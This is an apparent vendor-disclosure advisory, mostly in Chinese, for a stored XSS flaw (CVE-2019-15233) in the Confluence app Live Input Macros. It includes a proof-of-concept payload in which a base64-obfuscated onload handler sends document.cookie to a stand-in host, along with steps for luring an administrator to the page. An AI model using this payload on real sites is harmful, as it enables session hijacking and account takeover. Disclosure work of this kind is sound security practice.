(FAB-2019-00157) 由我发现的安全漏洞 CVE-2019-15233
安全公告: advisory
Advisory ID: FAB-2019-00157
Product: Live Input Macros
Manufacturer: Old Street Solutions
Affected Version(s): 2.10 and before
Tested Version(s): 2.10
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
CVSS v3.0: 7.6
Vektor String: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Vendor Homepage: https://www.oldstreetsolutions.com/
Software Link: https://marketplace.atlassian.com/apps/1215287/live-input-macros
Solution Status: Reported
Manufacturer Notification: 2019-08-19
Solution Date: 2019-08-20
Public Disclosure: 2019-08-20
CVE Reference: CVE-2019-15233
Author of Advisory: Francesco Emanuel Bennici, FABMation GmbH
此安全漏洞由 Francesco Emanuel Bennici [email protected]
(FABMation GmbH)发现。
Live Input Macros 允许用户将复选框、单选按钮、下拉列表等添加到 Confluence 页面,并在不编辑页面的情况下进行更改。
如果用户添加了恶意代码,攻击者可以在 Confluence 站点上执行 JavaScript 代码。
此漏洞可用于窃取(例如)管理员的会话 Cookie(会话劫持)。
复制以下内容:
Hello World this is my Text Box </p> </div>
alksdfjlkasdjflkj </p> " <br/> <style/onload=window.location=atob("aHR0cDovL2V2aWwuc2l0ZS8/PQ==")+document.cookie> <br/> " <p> asdasd
然后在 Confluence 页面上创建一个新元素。将这段文本粘贴进去,并与(例如)系统管理员共享该 Confluence 页面。当管理员访问该页面时,你就可以劫持/“复制”他的会话。